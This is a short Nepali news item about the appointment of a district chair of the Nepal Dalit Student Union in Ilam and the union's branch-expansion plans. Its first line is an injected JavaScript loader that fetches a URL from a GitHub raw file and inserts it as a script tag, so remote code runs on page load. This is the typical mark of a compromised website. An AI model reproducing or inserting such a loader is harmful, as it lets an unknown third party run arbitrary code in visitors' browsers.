;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत १६,
रामेछाप । नेपाल दलित् विद्यार्थी संघ इलामको जिल्ला अध्यक्षमा तिल विक्रम सुन्दास चयन भएका छन् । सोमबार केन्द्रीय अधयक्ष राजु सुनारले जिल्ला अध्यक्षमा सुन्दासलाई एक पत्रमार्फत जिम्मेवारी तोकेका हुन् ।
७७ वटै जिल्लामा आफ्नो शाखा विस्तारमा लागेको संगठनले हाल सम्ममा ३२ भन्दा बढी जिल्लाहरुमा शाखा गठन गरिसकेको केन्द्रीय अध्यक्ष सुनारले जुनेली न्युजसंग बताए ।
उनका अनुसा कम्तिमा ५० जिल्लामा शाखा विस्तार गरेपश्चार केन्द्रीय महाधिवेशन गर्ने योजना रहेको उनले सुनाए । त्यसको लागि देशभरीका दलित विद्यार्थीहरु एक ठाउँमा रहनु पर्नेमा जोड्दिए ।
विद्यार्थीहरुको पक्षमा आवज् बुल्नद गर्दै आएको संघले सधै जातियसंगै, विद्यार्थीको हक अधिकारको पक्षमा काम गर्ने केन्द्रीय अध्यक्ष सुनारको प्रतिवद्धता जनाए ।
फेसबुक प्रतिक्रियाहरु